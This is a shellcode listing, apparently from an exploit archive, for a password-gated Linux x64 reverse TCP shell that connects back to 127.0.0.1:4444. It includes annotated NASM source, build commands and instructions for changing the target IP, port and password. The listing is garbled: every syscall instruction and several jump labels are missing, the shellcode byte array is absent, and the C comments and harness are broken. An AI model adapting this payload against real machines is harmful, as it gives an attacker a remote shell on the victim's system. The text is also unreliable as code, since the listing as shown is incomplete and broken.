Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)









*Title:            tcp reverse shell with password prompt in 151 bytes 
*Author:           Sathish kumar
* Copyright:        (c) 2016 iQube. (
* Release Date:     January 6, 2016
*Description:      x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
*Tested On:        Ubuntu 14.04 LTS
*Build/Run:        gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
*                   ./bindshell
*                   nc localhost 4444   (as written this is a client connect; the .nasm below itself connect()s to 127.0.0.1:4444, so start a listener first, e.g. `nc -l -p 4444`, then run ./bindshell)
* NOTE: although the file is named bindshell, the .nasm source below issues connect() (syscall 0x2a) to 127.0.0.1:4444 rather than bind()/listen(); it is a reverse shell and needs a listener waiting on that port
* The top of this file contains the .nasm source code
* The Port can be Reconfigured According to your needs
* Instructions for changing port number
* Port helper: run the following in python and change the port value accordingly
*          				import socket
*		   				port = 4444
*          				hex(socket.htons(port))
*  					python 
*  					Result : 0x5c11 
* Replace the obtained value in the shellcode to change the port number
* For building the from .nasm source use
* 					nasm -felf64 filename.nasm -o filename.o
* 					ld filename.o -o filename
* To inspect for nulls
* 					objdump -M intel -D filename.o

global _start

; NOTE(review): this listing is an incomplete extraction of the original .nasm
; file. No `syscall` instruction, no `_start:` / `sock:` / `duplicate:` / `Exit:`
; label and no `section .text` directive survive, although `jmp sock`,
; `jne duplicate` and `jne Exit` below reference those labels. The comments
; describe the intended flow only as far as the visible lines establish it and
; mark every site where a `syscall` must sit. Do not assemble this as-is.
;
; Intended flow (as far as visible):
;   socket(AF_INET, SOCK_STREAM, 0)
;   connect(fd, {AF_INET, htons(4444), 127.0.0.1}, 16)
;   dup2(fd, 2); dup2(fd, 1); dup2(fd, 0)
;   write(1, "Passcode", 14); read(1, buf, 14)
;   first 4 bytes of buf == "hack" ? execve("/bin//sh", NULL, NULL) : exit(0)
;
; Security notes for anyone reusing this payload:
;   * the "password" is a 4-byte constant embedded in the payload and checked
;     with one dword compare; it is a tripwire against accidental connections,
;     not authentication, and anyone holding the payload bytes reads it out of
;     the immediate;
;   * the write length 0xe (14) exceeds the 8-byte prompt, so 6 bytes of the
;     code following `prompt` are also sent to the peer;
;   * nothing in the visible code checks any syscall's return value (negative
;     rax on error), so a failed connect()/read() just falls through.

    jmp sock                  ; hop over the inline data to the code (the `sock:` label is absent from this listing)
	prompt: db 'Passcode' ; 8-byte prompt kept inline in the code so the payload stays self-contained
   	; sock = socket(AF_INET, SOCK_STREAM, 0)
	; AF_INET = 2
	; syscall number 41

	xor rax, rax    ; rax = 0; registers hold unknown values when the payload is entered
	xor rsi, rsi    ; rsi = 0
	mul rsi         ; rdx:rax = rax * rsi = 0 -> also clears rdx (protocol arg) without a null byte in the encoding
	push byte 0x2   ; AF_INET via push/pop: shorter and null-free compared with a mov imm32
	pop rdi         ; rdi = 2 (domain)
	inc esi         ; rsi = 1 = SOCK_STREAM (a 32-bit write zero-extends into rsi)
	push byte 0x29  ; 0x29 = 41 = __NR_socket on x86-64
	pop rax
	; NOTE(review): a `syscall` belongs here; it is absent from this listing.
	; On return rax holds the new socket fd (or -errno, which is never checked).

	xchg rax, rdi   ; rdi = socket fd for the connect()/dup2() calls below; rax becomes 2 (scratch)
	; Build struct sockaddr_in (16 bytes) on the stack, lowest address = sin_family:
	;   sin_family = AF_INET (2)
	;   sin_port   = htons(4444) = 0x115c
	;   sin_addr   = 127.0.0.1 (not INADDR_ANY: this is the peer a reverse shell connects to)
	;   sin_zero   = 8 zero bytes
	xor rax, rax
	push rax                         ; sin_zero[8] = 0
	mov ebx , 0xfeffff80             ; 127.0.0.1 in network byte order is 0x0100007f, which contains nulls: load its complement ...
	not ebx                          ; ... and flip it back to 0x0100007f in the register
	mov dword [rsp-4], ebx           ; sin_addr is written just below rsp ...
	sub rsp , 4                      ; ... then rsp is moved down to cover it (`push ebx` is not encodable in 64-bit mode)
	push word 0x5c11                 ; sin_port = 0x115c = htons(4444) as a little-endian word immediate
	push word 0x02                   ; sin_family = AF_INET
	push rsp
	pop rsi                          ; rsi = &sockaddr_in, the 2nd connect() argument

    ; connect(sockfd, &server, sizeof(server)); rdi still holds the socket fd
    push 0x2a                        ; 0x2a = 42 = __NR_connect
    pop rax
    push 0x10                        ; sizeof(struct sockaddr_in) = 16
    pop rdx
    ; NOTE(review): `syscall` missing here in this listing; a failed connect (rax < 0) is not checked.
	; dup2(sockfd, 2), dup2(sockfd, 1), dup2(sockfd, 0): stderr, stdout and stdin all onto the socket
	push 0x3
	pop rsi								; rsi = 3; the loop pre-decrements, so the first dup2 targets fd 2

    dec esi                            ; rsi = 2, 1, 0 ...; ZF is set when 0 is reached, ending the loop after dup2(fd, 0)
    mov al, 0x21                       ; 0x21 = 33 = __NR_dup2; only AL is written, relying on the upper bits of rax
                                       ; being zero (true when the previous dup2 returned a small fd)
    jne duplicate                      ; NOTE(review): the `duplicate:` label (at `dec esi`) and the `syscall` between
                                       ; `mov al` and this jump are absent from this listing; the branch relies on the
                                       ; flags from `dec esi` surviving `mov` and the syscall
xor rax, rax
	inc al                             ; rax = 1 = __NR_write
	push rax
	pop rdi							   ; rdi = 1 (stdout, which is the socket after dup2)
	lea rsi, [rel prompt]              ; rsi = &"Passcode"; RIP-relative, so the payload is position-independent
	xor rdx, rdx                       ; clear rdx before the 8-bit-friendly push/pop below
	push 0xe
	pop rdx                            ; rdx = 14 (count). The prompt is only 8 bytes: the 6 bytes after it (the start of
	                                   ; the code following `prompt`) are sent to the peer too. 14 is reused as the read() length.
	; NOTE(review): `syscall` (write) missing here in this listing.
									   ; read(1, buf, 14): receive the passcode into the no-longer-needed sockaddr area at rsp
	push rsp
	pop rsi                            ; rsi = rsp = receive buffer; rdi = 1 and rdx = 14 are reused from the write
	xor rax, rax   ; rax = 0 = __NR_read
	; NOTE(review): `syscall` (read) missing here; the byte count it returns in rax is never checked and is
	; overwritten by the pop below, so a short read compares "hack" against stale sockaddr bytes and fails closed.
	push 0x6b636168 ; "hack" as a little-endian dword immediate: 0x68 'h', 0x61 'a', 0x63 'c', 0x6b 'k'
	pop rax         ; eax = "hack"; push/pop instead of mov keeps the encoding free of null bytes
	lea rdi, [rel rsi]  ; rdi = rsi = &buf (`rel` is meaningless with a register base; this is plain `lea rdi, [rsi]`)
	scasd           ; compare eax with dword [rdi]: only the first 4 input bytes are checked, so any input starting with
	                ; "hack" passes and trailing bytes are ignored. Assumes DF = 0; scasd also advances rdi by 4.
	jne Exit	    ; wrong passcode -> exit(0) below (the `Exit:` label is absent from this listing)

execve:                                      ; execve("/bin//sh", NULL, NULL)
     xor rsi , rsi
     mul rsi                                 ; rax = rdx = 0 -> argv = envp = NULL
     push ax                                 ; two zero bytes: the terminator that will follow "/bin//sh"
     mov rbx , 0x68732f2f6e69622f            ; "/bin//sh" little-endian; the double slash pads the path to 8 bytes without a null
     push rbx
     push rsp
     pop rdi                                 ; rdi = &"/bin//sh"
     push byte 0x3b                          ; 0x3b = 59 = __NR_execve
     pop rax
     ; NOTE(review): `syscall` missing here; if execve fails control falls through into the exit below.


	 ; Exit: (label absent from this listing) exit(0) on wrong passcode or execve failure
	 push 0x3c
	 pop rax        ; 0x3c = 60 = __NR_exit
	 xor rdi, rdi   ; status 0; NOTE(review): the final `syscall` is also missing from this listing


unsigned char code[] = \
//ip address which can be obtained by
/*			example
 * 			hex value equivalent =
//replace this with the ip address of the system to which the shell should connect
//Port number: this can be obtained from the instructions above
//Password this can be obtained by
 * python 
 * 			password = 'hack' 
 * 			(password[::-1]).encode('hex')      # Python 2; on Python 3 use password[::-1].encode().hex()
 * 			Result : 6b636168
 * 	This is stored in reverse because the dword is pushed little-endian onto the stack: the first character of the password is the lowest byte, so the immediate reads as the password reversed


	printf("Shellcode Length:  %d\n", (int)strlen(code));

	int (*ret)() = (int(*)())code;